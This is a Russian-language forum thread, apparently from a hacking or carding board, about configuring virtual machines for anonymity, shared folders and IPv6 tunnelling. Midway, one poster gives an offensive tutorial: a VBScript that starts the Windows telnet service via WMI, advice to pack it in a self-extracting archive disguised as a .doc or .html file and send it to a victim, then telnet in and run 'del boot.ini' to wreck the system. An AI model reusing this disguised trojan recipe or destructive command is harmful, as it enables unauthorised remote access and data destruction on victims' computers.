Чтиво Начало

Проверенная варя

У вас нет прав на просмотр ссылок, пожалуйста: Вход или Регистрация

Такая стоит у меня, Скидкина
Далее время на установку и пойдем далее

 

[volf]

Переходим на сайт

У вас нет прав на просмотр ссылок, пожалуйста: Вход или Регистрация

и качаем прогу DirecTransFile на основной машине, затем то же самое делаем на гостевой.
Программа нужна для перекидывания файлов на гостевую и наоборот
Можно применять и другие программы и методы, но мне кажется , это самый простой.

 

[Атум]

Ты про Варю?
просто на Виртуалбоксе есть проще метод.

 

[volf]

Ты про Варю?
просто на Виртуалбоксе есть проще метод.

Это универсальный способ , как для Вари так для др. и довольно простой.
Конечно есть проще методы индивидуально для каждой машины, зависит это от настроек
своей машины. Можно и через Флэшку.
Просто здесь мы будем рассматривать методы от новичков до профи.Но будем делать так,
если мы не новички, то будем ими, это надо , что бы все усвоили данные здесь уроки,
ведь уровень подготовки здесь присутствующих разный.
Лучше конечно делать, извините меня, писать, не у меня есть проще метод, а я делаю вот так.

 

[Атум]

У меня линукс например, и мне не подходит этот способ. Я юзаю Виртуалбокс и создание общей папки - проще некуда.

 

[one]

У вас нет прав на просмотр ссылок, пожалуйста: Вход или Регистрация

у тебя сообщение как из контекста вырванное, что за OVI и зачем его вообще кому-то запускать?

 

[volf]

У вас нет прав на просмотр ссылок, пожалуйста: Вход или Регистрация

у тебя сообщение как из контекста вырванное, что за OVI и зачем его вообще кому-то запускать?

Мы будем на нем учиться, там хороший софт. Я выше писал, что мы все новички, независимо от подготовки. Мы здесь не проводим битву профессионалов.Пожалуйста, читайте выше посты.
Линкус супер для анонимности. Потом и его рассмотрим Будем и его изучать , как боевую машину.
А что мешает на гостевой второй виртуалкой поставить винду.

 

[volf]

У меня линукс например, и мне не подходит этот способ. Я юзаю Виртуалбокс и создание общей папки - проще некуда.

Общая папка- это убийца анонимности, я уже писал об этом.

 

[volf]

Я не знаю у кого как, но для интереса и знаний, я ставил и Варю разных модификаций и тулбокс.
"Нужно знать немного обо всем и много об одном."

 

[Атум]

Общая папка- это убийца анонимности, я уже писал об этом.

Что-то не припомню...

 

[volf]

Предупреждение
Если браузер запрашивает установить Яву, всегда отказывайтесь, еще один предатель, который очень сложно скрыть
Быват случаи, когда она нужна (копча ), тогда заводите отдельный браузер в песочнице и загружайте ее только после установки браузера в песочнице.

 

[volf]

Что-то не припомню...

Чуть позже напишешь мне свой Айпи адрес, я залезу в твой комп именно через общую папку.
Правда, если линкус, придется покопаться. Это я еще не спец, а можешь представить что сделают спецы, имеющие для этого софт.

 

[Атум]

Чуть позже напишешь мне свой Айпи адрес, я залезу в твой комп именно через общую папку.
Правда, если линкус, придется покопаться. Это я еще не спец, а можешь представить что сделают спецы, имеющие для этого софт.

А вот этот момент хотелось бы подробней. Т.е. как себя обезопасить.

 

[one]

Да, подробную схему проникновения, без ненужных тонкостей, опиши пожалуйста, а то выглядит как фантастика.

 

[volf]

Да, подробную схему проникновения, без ненужных тонкостей, опиши пожалуйста, а то выглядит как фантастика.

Давайте не будем спешить. Все такие машинки напоминают TeamViwer, но лишь с той разницей , что не нужен пароль входа, только ставишь Айпи ищешь свободный порт сканером, нашел и тут вот тебе родная общая папка. ( описал , но очень очень приблизительно, есть конечно много тонкостей в этом деле, и фаирволы, которые обходятся и т.д и т.п.)
А для чего тогда брутики, рейкитики, кейлогеры и т.д. - не задумывались?
Ну а дедики откуда беруться, вот тебе и фантастика.

 

[one]

ну хорошо, а если комп за натом? что тебе тогда ip даст?

 

[volf]

ну хорошо, а если комп за натом? что тебе тогда ip даст?

Ну ребята давайте не будем отвлекаться.
Это другая тема, поищите эту тему в Бруте дедиков через гугл В этой теме будет столько вопросов
Это целый хакерский курс
Наша цель как скрыться от всего этого
Ну если так надо:
Так, для начала определимся, что нам будет нужно, и
постараемся обойтись минимальным набором. Если ты в курсе, в
WinXP существует служба с названием TlntSvr. Как ты думаешь,
что это за фишка?
Раскрою огромнейший сверхсуперсекрет: это служба Телнета! Что
такое Телнет и как им пользоваться, можно узнать, если зайти
в Центр справки и поддержки, который встроен у тебя в систему
(при условии, что ты поклонник дяди Билли и у тебя не Пингвин)
Или сделать Пуск - Выполнить - cmd.exe, в чёрном окошке вбить
telnet /? и читать, читать и читать!
После того как ты запомнишь основные команды телнета
(может, ты уже их знаешь? Тогда супер!), можно идти дальше.

Думаешь, зачем я всё это тебе рассказываю? А затем,
что этот самый телнет может очень нам помочь в деле удалённого
управления Ну и что с того, что эта служба по умолчанию
отключена? А мы возьмём и включим её. К сожалению, абсолютно
удалённо это сделать довольно нелегко, поэтому нам необходимо
нечто, запускающее эту службу.

III. Таблетки не помогут...

...потому что наш трой - это НЕ вредоносная программа
как таковая. В ней вообще нет ни строчки вредоносного кода! Это
обычная команда запуска системной службы. Вот только возможные
последствия могут быть крайне опасными
Смотря как воспользоваться этим методом...

Итак, нам необходимы следующие инструменты:
- текстовый редактор (подойдёт Блокнот)
- знание синтаксиса команд Telnet
- знание основных принципов организации операционной системы
WinXP, прикладных программ
- знание основных принципов построения и функционирования
локальных сетей и Интернет

Для начала этого хватит. Теперь открываем Блокнот и
вбиваем туда следующее:

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set colServiceList = objWMIService.ExecQuery _
("Select * from Win32_Service where Name='TlntSvr'")
For Each objService in colServiceList
errReturn = objService.StartService()
Next

Обо всём по порядку. Первая строка отвечает за то,
чтобы скрипт запустился на том компе, где его открыли.
Остальные варианты предназначены для контроллера домена AD
и не существенны в данной ситуации.
Вторая строка - это обращение к WMI - Windows
Management Instrumentation, или к Набору Инструментария
управления Виндовсом Очень нужная штука, кстати, и сейчас
мы это докажем
Третья строка нас отправляет с вопросом к WMI, типа,
а где тут у нас службы находятся? ))
На что WMI отвечает, что все службы тута, выбирай любую. Вот
мы и выбираем службу TlntSvr.
Теперь осталось запустить выбранную службу:
objService.StartService()

IV.

Зачем мы всё это делали? Затем, что теперь на той
машине, где сработал этот скрипт, есть очень интересный порт 23,
на котором висит не менее интересная служба ТЕЛНЕТ! Если,
конечно, ты понимаешь, к чему это я.

Собственно, теперь можно сохранить этот код из Блокнота
с расширением *.vbs, засунуть в самораспаковывающийся архив (если
не знаешь, что это такое - юзай справку WinRAR) и смело засылать
недругу с иконкой *.doc или *.html файла. После чего Пуск -
Выполнить - cmd.exe, там вбиваем telnet 123.45.67.89 и привет,
мы в корне диска удалённой машины. А дальше уже твоя фантазия )))

Самая оригинальная команда в этом случае - del boot.ini.

И пусть потом перезагрузится...

 

[volf]

ну хорошо, а если комп за натом? что тебе тогда ip даст?

Ну конечно зто уже что то,
но читай какие получаются косяки:
Если НАТ то доступ к ресурсам смогут иметь только компьютеры, умеющие работать с IP-v6.И еще не мало лет пройдет, пока народ начнет добровольно пересаживаться на новые диапазоны. Если уж с ХП никто слезть не может, то уж привыкать к сложным длинным адресам и подавно.

Кому надо, то пожалуйста:
кто-то не совсем точно понимает, что такое NAT, то можно почитать здесь (

У вас нет прав на просмотр ссылок, пожалуйста: Вход или Регистрация

).
Что такое туннель - здесь

У вас нет прав на просмотр ссылок, пожалуйста: Вход или Регистрация

Здесь пойдет речь о способе, , а именно об одном из туннельных брокеров gogo6

У вас нет прав на просмотр ссылок, пожалуйста: Вход или Регистрация

(

У вас нет прав на просмотр ссылок, пожалуйста: Вход или Регистрация

)
Скачиваем клиент на странице загрузки (

У вас нет прав на просмотр ссылок, пожалуйста: Вход или Регистрация

).

Установка
Установка банальна и скучна: I Agree > Next > Install > Finish
(не забудьте установить предложенный драйвер)
Настройка
Настойка на данном этапе не требуется.
Подключение
На вкладке Basic жмем Connect и переходим на вкладку Status.
Если подключение прошло успешно, то можете себя поздравить, компьютер уже в туннеле. В противном случае переходим на вкладку Log, жмем Open Log Window… > Refresh, исправляем ошибки.
Проверить соединения на предмет готовности работать в сетях можно на страничке

У вас нет прав на просмотр ссылок, пожалуйста: Вход или Регистрация

Что мы имеем на данном этапе?
1. Мы имеем доступ к сети IP-v6, если до этого его не было.
2. Мы убедились, что наш компьютер готов работать в данном туннеле.

Осталось зарегистрировать постоянное доменное имя для данного компьютера вида username.broker.freenet6.net, после чего можно будет поднимать на данном компьютере различные сервисы. Разумеется, доступ к ресурсам смогут иметь только компьютеры, умеющие работать с IP-v6.

Регистрация у данного брокера слегка мутноватая, поэтому сразу переходим на эту
(

У вас нет прав на просмотр ссылок, пожалуйста: Вход или Регистрация

)
страницу, вводим данные, нажимаем Submit и проверяем почту на предмет удачной регистрации. Затем снова открываем клиент, жмем Disconnect, изменяем адрес сервера на authenticated.freenet6.net и тип авторизации. Вводим логин и пароль, подключаемся.

какие нюансы
FTP пользуюсь = удачно (filezilla)
RDP Win7 пользуюсь = удачно
RDP 2003x86 проверял = неудачно, разбираться не стал за ненадобностью
Еще пробовал один старенький приватный RAT = неудачно

Вот мой тест:
Тест IPv4 записи в DNS
ок (0.615s) используя ipv4
Тест IPv6 записи в DNS
ок (1.025s) используя ipv6 6to4
Тест обеих (IPv4 и IPv6) записей в DNS
ок (1.218s) используя ipv4
Тест двухстекового (IPv4 и IPv6) DNS большими пакетами
ок (0.869s) используя ipv4
Тест IPv4 без использования DNS
ок (0.519s) используя ipv4
Тест IPv6 без использования DNS
ок (0.710s) используя ipv6 6to4
Тест IPv6 большими пакетами
ок (0.950s) используя ipv6 6to4
Тест использования IPv6 DNS сервером вашего провайдера
неудача (0.448s) как видим, не все провайдеры могут с этим работать
Find IPv4 Service Provider
ок (1.537s) используя ipv4 ASN 48331
Find IPv6 Service Provider
ок (1.612s) используя ipv6 6to4

 

[volf]

А вот этот момент хотелось бы подробней. Т.е. как себя обезопасить.

Открой свойство папки - галочка скрытый Доступ- отменить общий доступ.
Когда будет нужна, все делай как было, т.е. верни все настройки обратно.

 

[Атум]

Открой свойство папки - галочка скрытый Доступ- отменить общий доступ.

Где открыть? На гостевой оси, на основной, в настройках машины, в настройках виртуалки?
Пиши подробнее.

 

[volf]

Где открыть? На гостевой оси, на основной, в настройках машины, в настройках виртуалки?
Пиши подробнее.

Логически, выходишь инет откуда, в данный момент ты на основной, закрой на основной.
Работаешь с инетом на гостевой, закрой там.
Когда нужно, включишь.